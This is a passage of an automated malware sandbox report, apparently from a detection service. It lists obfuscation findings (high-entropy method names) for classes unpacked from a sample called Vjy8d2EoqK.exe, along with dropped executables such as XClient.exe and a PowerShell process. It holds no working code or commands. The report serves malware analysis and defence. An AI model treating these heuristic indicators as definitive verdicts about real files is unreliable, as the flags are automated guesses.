                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF703685F push rsi; ret 3_2_00007FFDF7036896
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A5A08 push esi; retf 5F4Dh6_2_00007FFD9B2A5AD7
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A39CD push E95E5205h; ret 6_2_00007FFD9B2A3A39
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B17D2A5 pushad ; iretd 17_2_00007FFD9B17D2A6
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JV0vfytHnkICvCjUiWq.csHigh entropy of concatenated method names: 'iFWUnNTmBd', 'WxeUWBksXN', 'ojgUQF3XDb', 'RanV0vXDHGRrq0jLTdA', 'JTr6JdXhbQlyYimSYAo', 'Kx6AbEXKBWOXQ7MXlnI', 'EujorgXUjCMPvYrSmhe', 'KiLUAGxrgd', 'dB8Ue2gjLp', 'nqwUfESXJk'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, t5BmhM71RBVutNWcVVM.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, vmUoogMoZ7t63nhJ2fA.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oYI48Fqn1AkaVIYuG1m', 'idjhejqMKboHpoubPJp', 'xTZ9NwqfM0sune0tTDs', 'gGFvatqoJjeykC2nRpq', 'MqqSMeq71V5Pam8Sl9W', 'fGeUk0q4dZmdZb9QEQ7'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.csHigh entropy of concatenated method names: 'HKISFgTYJM', 'KjSSblskpP', 'FhiSX9mp8U', 'YHPSulBGGi', 'WqHS2ZCmYX', 'ppHSPY4VhT', '_838', 'vVb', 'g24', '_9oL'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, oAixKhMgi1NyrkQL9eb.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'apnd3KFxC0ib8CxMJlj', 'rRXTjsFCPEQkYEPoMAT', 'Inl3tBFbRqQq5IcOiSD', 'k8XCBEFciXd5oe3tMk7', 'tMMiguFpsRyLUbGCfLf', 'm9NgJRF6svPh8o6Vglc'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, TGn25mMBn6ddL6qT9pa.csHigh entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'BPcx57GHYBWsX1XdBlQ', 'RGJwLhGsujYQktn6MB8', 'bybZmoGqe8ORibCuya3', 'zd6A5jGFijHxm5I5kJr', 'oAYpImGdNSv9tapAUU5', 'svwpFUGQl3D2rXn7xbO'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, yYprVsY8wfpeqvUvLdV.csHigh entropy of concatenated method names: 'UlFOUULXpo', 'c5AOCbcvYa', 'WCZQsqSY7FnIkp3cq0k', 'WpGwGVS2XEl5YwW8gmA', 'PAfH4MSNmsYCiwGrcW4', 'IVkXO6S3ReRXb6UjHgI', 'ieTOf0R1rG', 'Be17iwkrs8oL4thcFDU', 'LAwKSRkyY1agqf0Ih6B', 'cQ1M6ySaTHNmZV871Wx'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, uP2t2kBiaYKpOZqHv2.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'YFnsRVdSlDpb5eZTVO9', 'Y6W9QTdkMln5Mx6BiPp', 'jZPms7dAL1Jj5l0Tkt6', 'SeAqvOdWETD1rMQoI74', 'KNFTbjdXSo2ohl0kyOv', 'UAnw40dg3yQNvW5M31d'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, vQ5JZIGo3TYjJWFHUt.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'GLFZvTQ7iiQKxZH4air', 'dbSnLfQ4UGOIPDLMASP', 'Xwd5B5QlTby67F6XpEE', 'jJc87bQwr9o7olRkRLk', 'vpvPmoQZRYwTkvkqk5j', 'ztIImSQLVcswcD1mBKU'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, XFvZebYrmb4tpAtIe6b.csHigh entropy of concatenated method names: 'FlIivjPLEi', 'RHCiDyPdtv', 'cB0y6XUn4rQ0LCYVQNl', 'yXURuYUMFEqWh4KEpjX', 'rac6WOUtoZdeYlr8D6f', 'jmRHXBUvZgtFYFCWJk2', 'Ibu4tmUfa7EEiTZOQjd', 'J7G3DWUoIhdGnDBXT0C', 'kY1FcKU7fQHlU7s01cY', 'Fu8UI2U4dR3J3wRlpq3'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, xMCSNetqeYm9kSYvTZy.csHigh entropy of concatenated method names: 'jGDCa7uv8P', 'f9oCnnJcSq', 'xyCUDKtkZ1bTIDISVko', 'hxX55PtAQpAxupZJDOC', 'VepZQEtJEf5ZmgKljRq', 'dj3JKwtSKoIkoueTCl3', 'TwFKkjtW5ANY55dNWFQ', 'VhMr0QtXMxuvcXAkW8Y'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, hluG387c2TQXKLfFIi5.csHigh entropy of concatenated method names: 'xncSdchc35', 'Wv4SgmjsWg', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'paES5JOGJN', '_5f9', 'A6Y'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, lCQ1k2MuDYFt4bD2Mgy.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'U92r22GXT4ASrWuSdim', 'uV3VSGGg876qwqbxEC2', 'BNsGgYGtcP4pd2FaxDM', 'mk597YGvKvbkiVkU67c', 'pB3fxWGnTrZ3co24OFp', 'jtQEjdGMD9fl2bS5OiF'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, HdMPAIYlghUAXdOGxdo.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'ryD7WXWLKK', 'iFo7QWQdMP', 'oIg7RhUAXd', 'fGx7ldoqUH', 'LPF7wPQnk0', 'iJbLDpSFG9LCEH55Kq1', 'w1CtNqSOI03vewwmMu4', 'HPytOUSswM1o7t4Jwo5'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ReNpgNOOA8EeOiEY4Ra.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, WWoKZddyLRPo3RO1co.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'GM8S4DeG5SQGInOffEo', 'zs2ES4e9S9falIQkNHh', 'GqP92Yehv1GsdZ35fT9', 'IfDxVheKTjLsLjK2fZp', 'g5dt9feDHC8v7TjOEa2', 'zpcrFEeUlVDi94De0yY'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, mtgj6SMmZrhn9Txbl5Q.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'XusEDKqr6IDw5QCWFLw', 'yfLDS3qybeqAm5ppxxR', 'K03RpFqeARtCd8Wqo6U', 'P7FdZUqIjabVYQe8jFu', 'qfRJKGqdktvRWTdM9DD', 'atfdYTqQ4Nrb06qW7t0'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, EYr9r3ty9eqCxR6EynV.csHigh entropy of concatenated method names: 'IQDe6dnCGvm0veLHhp0', 'tOPpc4nbY6dnQAOdJ8E', 'A6uj3Wn0baV6Mvy2Nof', 'DnLF64nxugP8OquqONE', 'IWF', 'j72', 'XmBHf7apKZ', 'Ik9HmGvNg3', 'j4z', 'D5dH9eJoyo'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, IawrD3OYOmJuHWNhaid.csHigh entropy of concatenated method names: 'TCVJUPiAOi', 'MZ4JCvLjMo', '_8r1', 'trWJHqF0dx', 'ALfJpLQUtt', 'WaQJjtw0aM', 'fw0J4fPRh4', 'N7FsF3p8vxRc3XZSju9', 'dfCBXwpJDtb8uUBHDeh', 'D8LCknpSPiRJqqDD33h'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Dw8AKEORyFmKNrU2tn9.csHigh entropy of concatenated method names: 'QrOgl4LGEl', 'ge1d8nVlQeHQacOwhyT', 'Ac6jf9Vw7SLjcQPFEDs', 'HoQOr8V7Vyd5nmUSKO8', 'F3FxCWV4BQ1og3oC6We', '_1fi', 'GfhdP7BMQ7', '_676', 'IG9', 'mdP'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, fY9NWHMP090I2AhMOeE.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'G6VYKXGZCe1QOheyJxY', 'jp6DjhGLecwcf0L5KLK', 'G2DniHGRK4MBxY3f0Hj', 'LZWAxbG0eIuJwoeHsq8', 'JKHUoNGxK7Ct9r2Sjnq', 'Q6nu6VGCHZwVGS82dsn'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ldXXePO2cX0NgwpiRWG.csHigh entropy of concatenated method names: 'KTT5xV92Xh', '_1kO', '_9v4', '_294', 'DDj5T8D4wH', 'euj', 'jOU5qaiOc6', 'CJ85SB82SL', 'o87', 'fct5Jrjc7P'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, gPab3a8MAqVPB57oG2.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'TS8mNoI2GLiqiwJ1jkH', 'b890AJIBCY1t7DQSIYr', 'CS1ubGIPVXxTxbPXRGL', 'AnOLhlIaN0xZG4rJudx', 'JwEc1UIzg1oDkQXfdes', 'rYlI34drMTwBy1PpVSa'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, qK3JQBtPrVq6NPMPItr.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'PnHHpylGTU', 'Nw9BvowB16', 'JVsHjtbJZW', 'kGuBusUMXS', 'VAgVWZvbrbttqYpDNXS', 'TcSPanvcx24Q8RNvZ0t', 'JKWuFivxH4yjU2jMRjt'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, H98NOxMebTsjS0ADbOs.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'VyJXM8sNdLmbLMlPG7Q', 'DWtCZrs32jhqZmfBkBZ', 'qkR5nfsYDdypEJLANm6', 'GEfpLrs2DFPqbrgrQ5S', 'hQ5uwdsByIoRb6s1Gar', 'bT8QYgsPMkVHNK1Je0X'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, IalCeWM7MglbAULdQvn.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'N6OcO3HENBtpHHTYgNL', 'XW7AQkH1u70r05V6EwL', 'fVnZrGHmdtYv9RRoIy4', 'P4DXe7H5ST3VlQNpv7H', 'GK6IFHHi7cX4qRdGuVj', 'HNF7UIHT618nVTKJG66'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, pW67FLtexwAoathVKP6.csHigh entropy of concatenated method names: 'GZZUuFT6S5', 'X6HU26kKbO', 'rXHUPvC3Wg', 'PTKLvLXEYgeX3mvvWPu', 'wXruMcX1PiGsZZDPyim', 'StwBrOXm9QwGdoIOyY0', 'isITD5X5cl52oZHQvGx', 'mRibs4XiiyRijmwDGUG', 'j5Mv7nXTHFPQKNKVjHp', 'G0Un8pXN97v2POyMEyu'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Km4FQSYf0L1wJ2pbvZ3.csHigh entropy of concatenated method names: 'feEtNpmN9m', 'Mh5tc7wxLl', 'FbqeP5DAI4jixWSvY7T', 'iWsqecDW08yV2dCN4bM', 'K6nA39DXkyf9vb258ZJ', 'esqcctDgrZWjEvlJOv6', 'kZde8cDtV6vxxIvQsdY', 'npnm4GDvJgCDjiyhoP1', 'YpIgxlDna4ys7HNgh1P', 'HpflaDDMlAPdXxVdgSU'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Rfi8eTMlom2nGh4DAQK.csHigh entropy of concatenated method names: 'XxwMNmnt0N', 'MeoePROCUukXtBnIUJN', 'W3qjl2ObstKK1PUVFC5', 'SVio8FO0yh3ohgvotcD', 'vFrn9rOxLLYyaehaMU6', 'lkAZrXOc70wYXv69FMW', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, aep1OPbOyevn0hXfN9.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'iH9aq2dVICqvUQ6segQ', 'NK0yUWdjoW92h5pibUR', 'jR8sRldEBdifFkfrnLf', 'nVChv7d1jeLOGAXmhSp', 'nAxuBHdmRkRMqKvo3fG', 'iRf0COd5rYSM2C4pLa7'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, wiT6mpn50e3nRrtFEO.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'tX20j9les', 'HFRcKEe0e0mE64b5c8A', 'GO8wGMexPR2WkGXVUho', 'XVrs7IeCAYPvfF2FQnf', 'Q4Bda3ebjTniNQVXpAR', 'uDIJ7Necd4vPbESjxBR'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, xmEMNxxKN63tiF85sH.csHigh entropy of concatenated method names: 'S79qPkjkR', 'bIgSpsnq2', 'NtyJnhheU', 'VPPhDvJIU', 'r4udkqyZg', 'NYCgEoXE4', 'lon52fejd', 'gWhhW3yqEv0wJnx5vRX', 'ooiAykyFZKaoVrgyqoX', 'OIsp29yOnGwdhn7mqOA'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, SQQ6NMMssQSYZQmxPbB.csHigh entropy of concatenated method names: 'fwFMFdE5Rj', 'r3cHHqOeSnhNDJZ0yqd', 'RZXdCcOI2yGpNq5Zgap', 'pOut7yOrdlZWPcFde0p', 'G0I3ccOyNvUiF7oPpKb', 'V9Z0u8Od5pvaT7SPekj', 'rGyEkTOQQtve9FCHDar', 'HU5rVOOHUPu9MhkxXdJ', 'bxdMXSTDoc', 'Ac5j50OFxmlexB7HoXw'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Xkr3peYYoEE9FxXabta.csHigh entropy of concatenated method names: 'FVHYXkT2fS', 'QX4Yu2ZjH1', 'q9rY27H382', 'GQFYPTTuBe', 'TXDY1DLwIv', 'I6EYGGvW4Q', 'LCDyrChSkuFXHxx9hwT', 'VFNM2JhkibZuhs798m2', 'BilTCth8Pm0lMwUwQXF', 'QKCdY4hJ41rsIVjZHam'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ivC3WgipTXyMvuQNuvU.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, TKVmQYi4A3GOon2NYqC.csHigh entropy of concatenated method names: 'IqjjQFcsDr', 'tQ5jRw6iwu', 'GCljluG382', 'wQXjwKLfFI', 'e5Ij8lrAaV', 'waMDosMaYt4B68C4g91', 'e7cMVSMzrKt7Pah3Cjg', 'ecOF55MBNXfHZnQLhgk', 'fMoHw4MPKqbYfVNG8TL', 'kB1IrWfrov5JGqvTaeE'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, WQLspxMCbP1AgEms6IE.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'QI4sOcssqe7SPieD0Kq', 'tGL0yOsqvduTgKbU6at', 'RGunPBsF3fTY7uvwfls', 'Qkwyi3sOQ8vtycIKLEv', 'fC17XKsGyQrxl0bx49A', 'I4vOOYs9tYgf30exBbv'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, wXPglvM4BLMHwLrIDrg.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'L5EByaso5qwhNWRatBf', 'THw8ZRs73LVK66ovsWc', 'vtfVqls4T9E71P5FZZb', 'cUJs8Dsl5qdnDVcsgx8', 'foBuKWsw65JH8vV6af0', 'O7U2x2sZE6eDBsjDO5J'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, MrpGkdtmKrW1G5P0V7o.csHigh entropy of concatenated method names: 'vXyU1MvuQN', 'QvUUGc1kqY', 'zh5UEaaCZU', 'HxsUyO1KVm', 'HYAUZ3GOon', 'IxRUYcgHqh7ym2S8m9k', 'JwWkNlgspV48bX1P7xi', 'LnK6BCgdrHbW0umMa5q', 'h4oQUggQoAW1wpMBkiE', 'yPjh2qgq6k7THTeNUY0'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, IwOXb8iCw0D2Fe8oMPW.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, FXYiYtiLLuMVGTCtWPt.csHigh entropy of concatenated method names: 't0J4njicoc', 'WwN4Wa4gWV', 'woc4QyESyL', 'qpZ4R6SjHa', 'T4x4l5L2gL', 'BimtWnf02fTj4gqWmDr', 'GtLOmYfxGV1wvdB9osK', 'DhbufIfLNob0FooZkAs', 'AumoxMfREeWUq1HToVo', 'cErbtqfCCjYJCvlQxRP'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Yjp3dAtuit5mLcDwpHm.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'OLABXJ4nfX', '_168', 'b7xnxivMXoDp6AuHp1X', 'oqNSiuvf0kilCHfp6ca', 'NDBg4Fvo8h1jCEaR6F1', 'pcoVQ4v7JnoFFJZZlTh', 'eX5r1nv4lE8iJLpCF9x'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, CQoqbMOSZC7WRFtpTRS.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GUsXDe7aDj5GSyPa7ce.csHigh entropy of concatenated method names: 'LRHq1LKYRa', 'NbDqG02vj9', 'CXZqEZXmIU', 'ILRqy55j9A', 'WvtqZstIIt', 'aGJqNvXUHr', 'Tvh2yiCmqECdP5t7Uok', 'u4uGQACE5qseVooI5uE', 'N5qgYiC1If2pAiTlayI', 'fNtvAEC5AraMOJCoool'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, bkWjwqMDhXpHwjI6X6P.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'fKlEV7sc7kCdOpGFyHp', 'W6shqespeHViK8jJTR9', 'RLu08Xs6Qc6Blv64j8h', 'vs8W6usuSVakGOk8p77', 'uZ9nPFsVk03KmGjaTgZ', 'GZMSR9sjn83QaRqRyoV'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, UIUGiaISlwtKWVDC5qD.csHigh entropy of concatenated method names: 'K7y3qoqHmr', 'k1c3S0dWtP', 'LLw3JMksgv', 'YyL3h8m0cj', 'L1Q3dWCo6E', 'UIt3gSu27N', 'aU635EGjO9', 'Sv83sOei4V', 'JYy33FLX9W', 'yJE3asRTcK'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, YTn85ciy1iYu99sCyd9.csHigh entropy of concatenated method names: 'Y0CASxqkci', 'IotAhPq4DX', 'y0TAvosnZM', 'mhyADaRg5Q', 'iq2AAfPnkn', 'VrbAelc5WR', 'tD6AfdRpIA', 'bHSAmDiOk3', 'A1rA9XeWq7', 'txKAkJIQJR'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, r6fSoEYxqTGWtnAlg54.csHigh entropy of concatenated method names: 'o3diL5cZFY', 'JJ6ioUIoS2', 'iitixq5ciK', 'mFgiThbUgy', 'haqiq3OZkd', 'uvD5g08r2vxDBmm3pfs', 'oDMqRi8yOKy2Y20ZhjF', 'CcGBkrUacsEGSFK00x1', 'L8WKmjUzbKpijZGYeH8', 'jiRTeZ8eMT8POFxDBqA'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, k0XymUMcDmFy9eXxCu9.csHigh entropy of concatenated method names: 'n8iYxg1eyQ', 'tspYTxbP1A', 'BEmYqs6IEx', 'dY5QLX9GT5CTYKpRjAV', 'faUN9H9FQuGwEt4htfy', 'BGdITE9OdxDypDNlE90', 'OOXfVU99H07TtZqsSKq', 'R4aGrP9h6C36y7okaVg', 'aMyK839KRtMUla0Gurd', 'p5Uewc9DlQgiPERohlr'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, p3JMHgtVU5qFbiRjoTI.csHigh entropy of concatenated method names: 'sg9', 'T5OBVwMqDB', 'bdZCNCITf8', 'QiMBAf6Mk6', 'WwfacZtm6R5Q9TgnZgV', 'BuoU4Vt58O9SNO5OFnX', 'irT9SitiSamPJTviMAn', 'DBoY5YtEtI3DEJCy3Pu', 'Fyxc17t1dfKsZ8AnkiC', 'sYeiketTRj7VURkW55Q'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Yd3vAltMKpYCWSxC52d.csHigh entropy of concatenated method names: 'OijI5U7pPr', 'tsOIs9exmm', 'RgoI3tT2Ia', 'H3mIaqxveu', 'TEsxHWkzh3E3dl3yrMB', 'OO8tfykPikXNONB9mkU', 'sfaRdQka7FZws6jXD2h', 'ui0LRlArh4rwN8inPD0', 'NKQsxtAyq863OZOFgaG', 'oRxWbNAeHgRJcqIb4oh'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, rpvUlGzR0oL0uMULJ1.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Qbtk5CHILZMUF32Kb81', 'S2kjc9Hd1UR9vaZDylJ', 'aXGsrMHQjZLEZs77Mk3', 'Fc4MYmHHKdAhCSN1RtH', 'vElSBFHs7m5vnvwHhJI', 'V2s9QkHquKyZNJsIiiE'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, IGRSFS7sCCnd9uD71IJ.csHigh entropy of concatenated method names: 'HhPqXwYhLc', 'Dm0qup1bZh', 'Fm1q2f2l8o', 'O6up3uCpxxrfEj1N5u8', 'ulqx46Cbulymv8Q4Q1P', 'KoGfX1CcbdTtKGG5bnV', 'CFDpifC6QeJtDPSnbgR', 'Irkb6FCu0Bk0pfTmyFB', 'FLFk6cCVZei2OMxnMHf', 'rBiewcCjxbAUNFRClFn'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JGl3T2toijDJ0qCdxfl.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'ET3QJhtKOkKW6MRcLun', 'pNslxMtD9lKWwXIquo6', 'MQ237atU3BcYviBwXca', 'ofd8LZt8GbUn0EjPbbb'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, jugZiHNHqJGkLIk6DY.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'yvZJ9EQ3urpYsDAegle', 'aBPBpCQY1DKTIEqMjci', 'VAhEadQ2oDAvq0HChOZ', 'ReZWcpQBKjYUW6eFAUl', 'iALvNxQP8FwXeKV8KCN', 'lmjkT6QaEbrsv37i7nD'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, q64TSwO3VxRS5ygGIt4.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 's7rhSQ03EP', 'Y6phJBFWgR', 'T4QhhtIqV5', 'hBmhdZiAtm', 'cM4hgcyx7h', 'bhPh586Xj0', 'CZmxp5uCl6fFeMvKOdw'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, NlXYoBMIfrmgFMsfkJA.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'TKEumIHYRUJADZg9FYf', 'XieHInH2YZEjw6d5mho', 'ak2iCLHBLaqyYlat5Dm', 'oEow4FHPDb5ZQTdlqX9', 'XJgUHLHavpIyoJMdYm6', 'W2qNZIHzqt81UeMX8TO'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, NNiupClTuhKeiVG81r.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'JFdLKLIxUmWdpdOuwfD', 'jYgViVICtRuJEbNGovk', 'HBFxywIb3XaLdFC7Xny', 'QGoREHIcpZhd5fyNFHQ', 'VAj7E7IpF9yKPCFtBEK', 'bA6q01I6MngRQZrxOnv'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, BpUM417Coj4oCsLb9jZ.csHigh entropy of concatenated method names: 'FCPqrSlHyg', 'uhRqLHbyVA', 'rbmHhjx3LsESm2Jqksw', 'YG77vfxYjpaIGNolkGK', 'WT8Rx3x2fvO1KL6ut1Y', 'h75hvvxBJhXmw26NfAy', 'yi0d9dxPjVF5yIqDTSI', 'jA0vwaxabOdeP21bZWR', 'OELVAcxz7kUAWZxN2O0', 'eU44oICr9IlokJsS1bl'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, g4lx8sMMqvcGbF6iW6G.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'umZ1dxHAleYGwnBdORe', 'h6tfNGHW6jxboeHgJI3', 'LfDERUHXdoo0SPm0pDc', 'DWexTCHgCJcZ2EfgAyV', 'qZS8wXHtpiMQY9MddDk', 'uN74rWHvdAOfUCckX68'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, VgBWGkMGVGtIw6KbFkM.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'wmB5x7G5vuACrx7YfAX', 'rwuY21GiY4BFQCSNSIO', 'Cj6ydvGT3gDOuIJstqr', 'QDMPdrGNWTYwMxjELvl', 'cfWF55G3G14CDhAphtw', 'I0urigGYQUcf8Haa9ot'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, DoVKaBt4VTlK56eylwm.csHigh entropy of concatenated method names: '_223', 'ABywGIXSw0wj0Si3UZK', 'BZ2miEXka8JAIPjXJB5', 'r7T59TXApx4QbUIAeLo', 'yfXCvJXW9rgn8JZ0qWw', 'wxro1kXXPVO8cbgGQvQ', 'v8BJJMXgYN9j1a1sYst', 'zKu9oMXtk6iGgSHNNt5', 'ej0GNRXv13yqI50rOrj', 'bdQDLOXn0nms4drDabd'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, RjC1biMb1YDHJsDhtto.csHigh entropy of concatenated method names: 'whcYpbj8kG', 'g4fYjqTpHm', 'DkmD2bG9yenP0Q5mfrG', 'xvq6kBGOIf0kbtxF5aG', 'tNnMV7GGsXq0mODv7Kw', 'jsxyGYGhlFDr7TOb6Ch', 'GfDbfEGKEqlhsNR1U8f', 'YpGLSHGD8rp6NFKHG30', 'HWqf8aGUavlXAQMQWsW', 'qmWI12G83OLfSo9JOia'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, DZcl5kiNdCSmqbKa9YO.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ffnBgh7hIQL0VtXeBPw.csHigh entropy of concatenated method names: 'HMrqwcidiQ', 'fQGq8Hx7XE', 've2q6cPu4A', 'n9pqVUQJXa', 'QJvq0sx4Kc', 'eRpUeWC7KFhmlE5bA9M', 'z90gstCf6NiwP9l1YJP', 'buYO0uCoQxOaryDZnDU', 'gqjqdWC47yU7yqvRLMQ', 'bNClSKClV6nuBTDbDcP'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, kPLEi2YKHCyPdtvK28E.csHigh entropy of concatenated method names: 'v4sYSxnSwJ', 'u4uYJc6ICf', 'w2DYhd9iVC', 'H8XlTS9L3cJX0uo1t9q', 'V5p5ug9RBx3igTZ3qJQ', 'sW4a44900jPQIfSDE4w', 'BIalYG9xlQvyAZoptFV', 'kuq0CF9C2M9KsGoHlBW', 'IioqH09bv5QiXwqYw6p', 'aexZr89wBGwZVneNCuI'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, lRC9a7Y9LwfMUocEmIo.csHigh entropy of concatenated method names: 'K6ktzsygBW', 'UkViKGtIw6', 'abFiMkMBWE', 'THiiYOvi40', 'HLaitB1cth', 'LkUiieO3Qp', 'x8vi7k1yGT', 'jD4iOWXfte', 'nTwiIOZaXd', 'S7SiUIcLOI'
